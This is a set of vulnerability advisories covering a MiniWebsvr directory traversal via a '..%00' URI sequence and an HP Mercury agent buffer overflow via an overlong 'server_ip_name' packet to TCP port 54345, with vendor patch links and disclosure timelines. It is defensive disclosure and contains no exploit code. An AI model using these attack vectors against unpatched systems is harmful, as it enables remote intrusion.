Directory traversal vulnerability in Nickolas Grigoriadis Mini Web server (MiniWebsvr) 0.0.6 allows remote attackers to list the directory immediately above the web root via a ..%00 sequence in the URI. Miniwebsvr is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid in further attacks. Note that the attacker can traverse to only one directory above the current working directory of the webserver application. Version 0.0.6 is vulnerable to this issue; other versions may also be affected

Stack-based buffer overflow in magentproc.exe for Hewlett-Packard Mercury LoadRunner Agent 8.0 and 8.1, Performance Center Agent 8.0 and 8.1, and Monitor over Firewall 8.1 allows remote attackers to execute arbitrary code via a packet with a long server_ip_name field to TCP port 54345, which triggers the overflow in mchan.dll. Authentication is not required to exploit this vulnerability.The specific flaw exists within the process magentproc.exe that binds to TCP port 54345. When parsing packets containing an overly long 'server_ip_name' field, an exploitable stack overflow may be triggered due to an an inline strcpy() within the library mchan.dll. Multiple Mercury products are prone to a stack-based buffer-overflow vulnerability because the applications fail to bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will result in a denial of service. HP Mercury is an IT management software developed by Mercury acquired by HP. Authentication is not required to exploit this vulnerability. -- Vendor Response: Hewlett-Packard has issued an update to correct this vulnerability. More details can be found at: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00854250 -- Disclosure Timeline: 2006.10.27 - Vulnerability reported to vendor 2006.11.10 - Digital Vaccine released to TippingPoint customers 2007.02.08 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Eric DETOISIEN. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. Try it out online: http://secunia.com/software_inspector/ ---------------------------------------------------------------------- TITLE: HP Mercury Products Long "server_ip_name" Buffer Overflow SECUNIA ADVISORY ID: SA24112 VERIFY ADVISORY: http://secunia.com/advisories/24112/ CRITICAL: Moderately critical IMPACT: System access WHERE: >From local network SOFTWARE: Mercury LoadRunner Agent 8.x http://secunia.com/product/13450/ Mercury Monitor over Firewall 8.x http://secunia.com/product/13449/ Mercury Performance Center Agent 8.x http://secunia.com/product/13448/ DESCRIPTION: A vulnerability has been reported in various HP Mercury products, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to a boundary error within MCHAN.DLL when parsing packets sent to MAGENTPROC.EXE on port 54345/TCP. -- Mercury LoadRunner Agent 8.1 FP4 -- NT: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/c337892f322b2311 c22572670060b795?OpenDocument AIX, HP, Solaris, Linux: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/6d7ce88c0d5c4b36 c225726a004a94a2?OpenDocument -- Mercury LoadRunner Agent 8.1 SP1, FP1, FP2, FP3 -- Update to 8.1 FP4 and apply patches listed above. -- Mercury LoadRunner Agent 8.1 GA -- NT: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/7cd789640e496c34 c225726700613486?OpenDocument AIX, HP, Solaris, Linux: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/f2de896609dd7efb c225726a004af033?OpenDocument -- Mercury LoadRunner Agent 8.0 GA -- NT: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/fa4a48afea2f8198 c22572670061bbe7?OpenDocument AIX, HP, Solaris, Linux: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/5de153e30789fa4a c225726a004b2354?OpenDocument -- Mercury Performance Center Agent 8.1 FP4 -- NT: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/ae5d9a48a163fbb4 c225726a004c7831?OpenDocument AIX, HP, Solaris, Linux: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/34e894d8d8a1b941 c225726a004ff335?OpenDocument -- Mercury Performance Center Agent 8.1 FP1, FP2, FP3 -- Update to version 8.1 FP4 and apply patches listed above. -- Mercury Performance Center Agent 8.1 GA -- NT: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/0831f8b0bd9d9619 c225726a004cf7fe?OpenDocument AIX, HP, Solaris, Linux: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/a7333913152e65e1 c225726a005035e4?OpenDocument -- Mercury Performance Center Agent 8.0 GA -- Update to version 8.1 GA and apply patches listed above. -- Mercury Monitor over Firewall 8.1 -- NT: http://webnotes.merc-int.com/patches.nsf/c4d68388a23535dc422567d0004bbae2/c9b9924b3206614f c225726a004ded7d?OpenDocument PROVIDED AND/OR DISCOVERED BY: Discovered by Eric Detoisien and reported via ZDI. ORIGINAL ADVISORY: HPSBGN02187 SSRT061280: http://www5.itrc.hp.com/service/cki/docDisplay.do?docId=c00854250 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-07-007.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------